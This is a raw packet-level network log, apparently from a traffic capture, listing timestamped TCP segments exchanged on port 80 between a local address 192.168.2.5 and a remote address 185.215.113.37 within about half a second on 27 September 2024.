Sep 27, 2024 04:14:15.755882025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.755882025 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.756021023 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756031990 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756042004 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756056070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756067991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756071091 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.756078005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756088972 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756098032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756108046 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:15.756122112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.756122112 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.756140947 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.871567011 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:15.876550913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093579054 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093600035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093610048 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093664885 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093669891 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093681097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093693018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093729973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093729973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093806982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093817949 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093827963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093869925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093869925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093909979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093920946 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093930006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093939066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093955994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093966961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093976974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.093980074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.093980074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094013929 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094095945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094166040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094177008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094182014 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094187975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094197035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094221115 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094320059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094331980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094341993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094347000 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094352007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094362974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094373941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094379902 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094379902 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094461918 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094472885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094502926 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094502926 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094531059 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094610929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094621897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094630957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094641924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094651937 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094661951 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094671965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094679117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094679117 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094681978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094693899 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094719887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094719887 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094741106 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094914913 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094924927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094934940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094944954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094954967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094964981 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094966888 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.094975948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094986916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.094997883 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095031023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095092058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095218897 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095230103 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095240116 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095251083 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095262051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095271111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095278978 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095284939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095309973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095309973 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095402002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095506907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095516920 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095526934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095535994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095546961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095561981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095562935 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095573902 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095583916 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095592976 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095592976 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095593929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095603943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095613956 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095622063 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095633030 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095643997 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095643997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095643997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095654011 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095664978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095674038 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095674038 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095674992 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095684052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.095707893 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095721960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.095864058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096081018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096090078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096100092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096111059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096120119 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096127033 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096138954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096164942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096164942 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096189976 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096292019 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096302032 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096311092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096319914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096328974 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096338987 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096348047 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096355915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096355915 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096359015 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096369028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096379042 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096379995 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096415043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096415043 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096602917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096612930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096622944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096632957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096642971 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096652985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096662045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096666098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096666098 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096671104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096679926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096690893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096702099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096702099 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096702099 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096714020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096724033 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096733093 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096735001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096744061 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096755028 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096759081 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096765041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096775055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096784115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096793890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.096796036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096796036 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096827030 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.096915007 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097372055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097381115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097390890 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097399950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097405910 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097409010 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097419024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097429037 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097438097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097443104 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097444057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097453117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097462893 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097472906 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097481966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097486019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097486019 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097491980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097501040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097508907 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097512007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097541094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097541094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097850084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097861052 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097870111 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097879887 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097891092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097899914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097909927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097919941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097920895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097920895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097929001 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097939014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097949982 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.097965002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097965002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.097997904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.186125040 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186146021 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186161995 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186254978 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186269045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186281919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186291933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.186326027 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.186579943 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218116045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218154907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218167067 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218229055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218240976 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218244076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218244076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218255043 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218266964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218280077 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218302965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218327045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218362093 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218362093 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218452930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218465090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218476057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218487024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218497992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218507051 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218517065 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218517065 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218519926 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218552113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218575954 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218580008 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218635082 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218748093 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218759060 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218770027 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218780041 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218787909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218796968 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218808889 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218820095 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218830109 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218831062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218831062 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218842983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.218857050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218877077 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.218900919 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219001055 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219182968 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219188929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219208002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219218969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219228983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219239950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219242096 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219249964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219259977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219270945 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219281912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219290018 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219299078 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219310045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219312906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219312906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219320059 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219331026 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219341993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219350100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219367981 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219413042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219696045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219707012 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219724894 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219734907 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219744921 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219754934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219764948 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219773054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219773054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219774961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219784975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219795942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219805002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219810963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219810963 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219815969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219825983 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219836950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219840050 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219846964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219858885 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219863892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219863892 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219870090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.219913960 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.219914913 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220227003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220237970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220248938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220257998 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220268965 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220279932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220288992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220295906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220295906 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220374107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220385075 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220402956 CEST	49704	80	192.168.2.5	185.215.113.37
